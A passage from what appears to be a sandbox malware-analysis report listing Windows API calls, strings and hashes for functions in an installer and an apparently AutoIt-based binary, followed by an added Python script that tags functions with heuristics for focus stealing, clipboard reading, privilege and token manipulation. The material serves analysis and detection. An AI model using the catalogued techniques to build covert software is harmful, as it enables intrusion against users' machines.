                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            Strings
                                                                            • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                            • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                            • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                            • API String ID: 1697273262-1764544995
                                                                            • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                            • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                            • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                            • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 00404902
                                                                            • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                              • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                            • String ID: $@rD
                                                                            • API String ID: 3748168415-881980237
                                                                            • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                            • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                            • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                            • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                            APIs
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                              • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                              • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                            • lstrlenW.KERNEL32 ref: 004026B4
                                                                            • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                            • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                            • String ID: CopyFiles "%s"->"%s"
                                                                            • API String ID: 2577523808-3778932970
                                                                            • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                            • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                            • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                            • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcatwsprintf
                                                                            • String ID: %02x%c$...
                                                                            • API String ID: 3065427908-1057055748
                                                                            • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                            • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                            • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                            • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                            APIs
                                                                            • OleInitialize.OLE32(00000000), ref: 00405057
                                                                              • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                            • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                            • String ID: Section: "%s"$Skipping section: "%s"
                                                                            • API String ID: 2266616436-4211696005
                                                                            • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                            • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                            • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                            • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                            APIs
                                                                            • GetDC.USER32(?), ref: 00402100
                                                                            • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                              • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                            • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                              • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                            • String ID:
                                                                            • API String ID: 1599320355-0
                                                                            • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                            • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                            • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                            • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
APIs
  • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
• lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
• lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
• lstrcpynW.KERNEL32(?,?,?), ref: 00407261
Strings
Similarity
• API ID: lstrcpyn$CreateFilelstrcmp
• String ID: Version
• API String ID: 512980652-315105994
• Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
• Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
• Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
• Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
APIs
• DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
• GetTickCount.KERNEL32 ref: 00403303
• CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
• ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
Similarity
• API ID: Window$CountCreateDestroyDialogParamShowTick
• String ID:
• API String ID: 2102729457-0
• Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
• Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
• Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
• Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
APIs
• GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
• GetProcAddress.KERNEL32(?,00000000), ref: 00406395
• GlobalFree.KERNEL32(00000000), ref: 0040639E
Similarity
• API ID: Global$AddressAllocByteCharFreeMultiProcWide
• String ID:
• API String ID: 2883127279-0
• Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
• Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
• Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
• Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
APIs
• GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
• lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
Strings
Similarity
• API ID: PrivateProfileStringlstrcmp
• String ID: !N~
• API String ID: 623250636-529124213
• Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
• Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
• Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
• Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
• CloseHandle.KERNEL32(?), ref: 00405C71
Strings
• Error launching installer, xrefs: 00405C48
Similarity
• API ID: CloseCreateHandleProcess
• String ID: Error launching installer
• API String ID: 3712363035-66219284
• Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
• Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
• Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
• Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
APIs
• lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
• wvsprintfW.USER32(00000000,?,?), ref: 004062C7
  • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
Strings
Similarity
• API ID: CloseHandlelstrlenwvsprintf
• String ID: RMDir: RemoveDirectory invalid input("")
• API String ID: 3509786178-2769509956
• Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
• Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
• Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
• Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
APIs
• lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
• lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
• CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
• lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
Similarity
• API ID: lstrlen$CharNextlstrcmpi
• String ID:
• API String ID: 190613189-0
• Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
• Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
• Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
• Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4
APIs
  • Part of subcall function 004A29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,004A1CE4,?), ref: 004A29F3
• DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0052D208
• SendMessageW.USER32(?,0000130B,00000000,00000000,?,?,?), ref: 0052D249
• GetWindowLongW.USER32(FFFFFDD9,000000F0,?,?,?), ref: 0052D28E
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0052D2B8
• SendMessageW.USER32 ref: 0052D2E1
• _wcsncpy.LIBCMT ref: 0052D359
• GetKeyState.USER32(00000011,?,?,?), ref: 0052D37A
• GetKeyState.USER32(00000009), ref: 0052D387
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0052D39D
• GetKeyState.USER32(00000010), ref: 0052D3A7
• SendMessageW.USER32(?,0000110A,00000009,00000000,?,?,?), ref: 0052D3D0
• SendMessageW.USER32 ref: 0052D3F7
• SendMessageW.USER32(?,00001030,?,0052B9BA,?,?,00000000,?,?,?,?,?,?), ref: 0052D4FD
• ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0052D513
• ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0052D526
• SetCapture.USER32(?), ref: 0052D52F
• ClientToScreen.USER32(?,?,?,?,00000001,@GUI_DRAGID), ref: 0052D594
• ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0052D5A1
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0052D5BB
• ReleaseCapture.USER32(?,?,?), ref: 0052D5C6
• GetCursorPos.USER32(?,?,00000001,?,?,?), ref: 0052D600
• ScreenToClient.USER32(?,?), ref: 0052D60D
• SendMessageW.USER32(?,00001012,00000000,?,?), ref: 0052D669
• SendMessageW.USER32 ref: 0052D697
• SendMessageW.USER32(?,00001111,00000000,?,?), ref: 0052D6D4
• SendMessageW.USER32 ref: 0052D703
• SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0052D724
• SendMessageW.USER32(?,0000110B,00000009,?), ref: 0052D733
• GetCursorPos.USER32(?), ref: 0052D753
• ScreenToClient.USER32(?,?), ref: 0052D760
• GetParent.USER32(?,?), ref: 0052D780
• SendMessageW.USER32(?,00001012,00000000,?,?), ref: 0052D7E9
• SendMessageW.USER32 ref: 0052D81A
• ClientToScreen.USER32(?,?), ref: 0052D878
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0052D8A8
• SendMessageW.USER32(?,00001111,00000000,?,?), ref: 0052D8D2
• SendMessageW.USER32 ref: 0052D8F5
• ClientToScreen.USER32(?,?), ref: 0052D947
• TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0052D97B
  • Part of subcall function 004A29AB: GetWindowLongW.USER32(?,000000EB,?,?,?,004A1AE0,?,?,?,?,?,?,004A1D8F,?,?,?), ref: 004A29BC
• GetWindowLongW.USER32(?,000000F0,?,?,?,?,?,?,?), ref: 0052DA17
Strings
Memory Dump Source
• Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
• Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
• String ID: @GUI_DRAGID$F
• API String ID: 3977979337-4164748364
• Opcode ID: 113c09e077079299b2518824aad2bd3c0c87f235f55557b0b16967c69381764f
• Instruction ID: bfab1f73212922c873604b11ec27ba10d5777518f4276c70fecff2837a50a513
• Opcode Fuzzy Hash: 113c09e077079299b2518824aad2bd3c0c87f235f55557b0b16967c69381764f
• Instruction Fuzzy Hash: 2242CD30204351AFD725CF28D858BAABFF5FF9A314F140A19F695872E0C7719858DBA2
APIs
• GetForegroundWindow.USER32(00000000,?), ref: 004B5EE2
• FindWindowW.USER32(Shell_TrayWnd,00000000,?), ref: 004F10D7
• IsIconic.USER32(?,?), ref: 004F10E0
• ShowWindow.USER32(?,00000009), ref: 004F10ED
• SetForegroundWindow.USER32(?), ref: 004F10F7
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004F110D
• GetCurrentThreadId.KERNEL32 ref: 004F1114
• GetWindowThreadProcessId.USER32(?,00000000), ref: 004F1120
• AttachThreadInput.USER32(?,00000000,00000001), ref: 004F1131
• AttachThreadInput.USER32(?,00000000,00000001), ref: 004F1139
• AttachThreadInput.USER32(00000000,?,00000001), ref: 004F1141
• SetForegroundWindow.USER32(?), ref: 004F1144
• MapVirtualKeyW.USER32(00000012,00000000,00000000,00000000), ref: 004F1159
• keybd_event.USER32(00000012,00000000), ref: 004F1164
• MapVirtualKeyW.USER32(00000012,00000000,00000002,00000000), ref: 004F116E
• keybd_event.USER32(00000012,00000000), ref: 004F1173
• MapVirtualKeyW.USER32(00000012,00000000,00000000,00000000), ref: 004F117C
• keybd_event.USER32(00000012,00000000), ref: 004F1181
• MapVirtualKeyW.USER32(00000012,00000000,00000002,00000000), ref: 004F118B
• keybd_event.USER32(00000012,00000000), ref: 004F1190
• SetForegroundWindow.USER32(?), ref: 004F1193
• AttachThreadInput.USER32(?,?,00000000), ref: 004F11BA
Memory Dump Source
• Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
• Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
• String ID: Shell_TrayWnd
• API String ID: 4125248594-2988720461
• Opcode ID: 9cbe31932c098db9bd0f864910c18d751196a00be8751868eb8ebf40dfaef1cd
• Instruction ID: dd717a2b533c73dc1dbe46e5aedea7ff88b0550532ae3b7d9dc42f15efbb5da5
• Opcode Fuzzy Hash: 9cbe31932c098db9bd0f864910c18d751196a00be8751868eb8ebf40dfaef1cd
• Instruction Fuzzy Hash: EB316271A4031CBFEB216B619C4AF7F3E6CEB54B50F104016FB04AA2E1CAB45951EEA5
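The listing above is the raw call sequence of one function, and the report prints every function in the same shape. The Python below is an editor's example added to this page, not Joe Sandbox code: it parses API lines in exactly this format into records and applies a few co-occurrence signatures to say what a function is for. The two sample strings are lines copied from the listings on this page; the regular expression, the ApiCall record, the signature names and the VK_MENU check are the editor's own triage heuristics, not the sandbox's detection logic.

```python
"""Parse Joe Sandbox per-function API listings and tag the behaviour each function implements.

Added example for this report; not Joe Sandbox code. SAMPLE_FOCUS and SAMPLE_TOKEN are
lines copied from the function listings on this page; SIGNATURES are the editor's own
triage heuristics.
"""
import re
from dataclasses import dataclass

# One API line looks like one of:
#   • AttachThreadInput.USER32(?,00000000,00000001), ref: 004F1131
#   • GetCurrentThreadId.KERNEL32 ref: 004F1114
#     • Part of subcall function 004F9399: GetLastError.KERNEL32 ref: 004F941D
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str          # e.g. "keybd_event"
    module: str       # e.g. "USER32"
    args: tuple       # stack arguments as printed: hex strings, literals or "?"
    ref: int          # address of the call site
    subcall: bool     # True when the report attributes the call to a callee


def parse_api_lines(text: str) -> list:
    """Return the ApiCall records found in a block of report text; other lines are ignored."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        calls.append(ApiCall(m.group("api"), m.group("mod").upper(), args,
                             int(m.group("ref"), 16), m.group("sub") is not None))
    return calls


# A signature fires when every listed API appears in the same function (heuristic, tune before use).
SIGNATURES = {
    "foreground-focus-steal": {"AttachThreadInput", "keybd_event", "SetForegroundWindow"},
    "clipboard-read": {"OpenClipboard", "GetClipboardData", "GlobalLock"},
    "privilege-adjust": {"LookupPrivilegeValueW", "AdjustTokenPrivileges"},
    "token-to-interactive-desktop": {"DuplicateTokenEx", "OpenWindowStationW", "OpenDesktopW"},
    "recursive-directory-walk": {"FindFirstFileW", "FindNextFileW", "SetCurrentDirectoryW"},
    "registry-write": {"RegCreateKeyExW", "RegSetValueExW"},
}


def tag_function(calls: list) -> list:
    present = {c.api for c in calls}
    return sorted(name for name, needed in SIGNATURES.items() if needed <= present)


def uses_alt_key_trick(calls: list) -> bool:
    """keybd_event with VK_MENU (0x12) is the well-known way to release the foreground lock."""
    return any(c.api == "keybd_event" and c.args[:1] == ("00000012",) for c in calls)


SAMPLE_FOCUS = """\
• FindWindowW.USER32(Shell_TrayWnd,00000000,?), ref: 004F10D7
• IsIconic.USER32(?,?), ref: 004F10E0
• ShowWindow.USER32(?,00000009), ref: 004F10ED
• GetCurrentThreadId.KERNEL32 ref: 004F1114
• AttachThreadInput.USER32(?,00000000,00000001), ref: 004F1131
• MapVirtualKeyW.USER32(00000012,00000000,00000000,00000000), ref: 004F1159
• keybd_event.USER32(00000012,00000000), ref: 004F1164
• SetForegroundWindow.USER32(?), ref: 004F1193
• AttachThreadInput.USER32(?,?,00000000), ref: 004F11BA
"""

SAMPLE_TOKEN = """\
  • Part of subcall function 004F9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004F93E3
  • Part of subcall function 004F9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004F9410
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004F8FC3
• OpenWindowStationW.USER32(winsta0,00000000,00060000,?,?,?,00000001,?,?), ref: 004F8FEB
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004F9028
"""


def triage(text: str) -> dict:
    calls = parse_api_lines(text)
    return {"calls": len(calls), "tags": tag_function(calls), "alt_key_trick": uses_alt_key_trick(calls)}


if __name__ == "__main__":
    for name, sample in (("focus", SAMPLE_FOCUS), ("token", SAMPLE_TOKEN)):
        print(name, triage(sample))
```

Two caveats when reading the tags. First, these are capabilities present in the code, not behaviour the sandbox observed at run time; a bundled runtime carries many such functions whether or not the payload ever calls them (the @GUI_DRAGID, REG_* type-name and %4d%02d%02d%02d%02d%02d strings on this page look like AutoIt3 interpreter strings, which is the editor's inference, not a finding of the report). Second, the argument slots the report prints are raw stack contents, so calls with fewer real parameters still show trailing values; the parser keeps them as printed and leaves interpretation to the caller.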
APIs
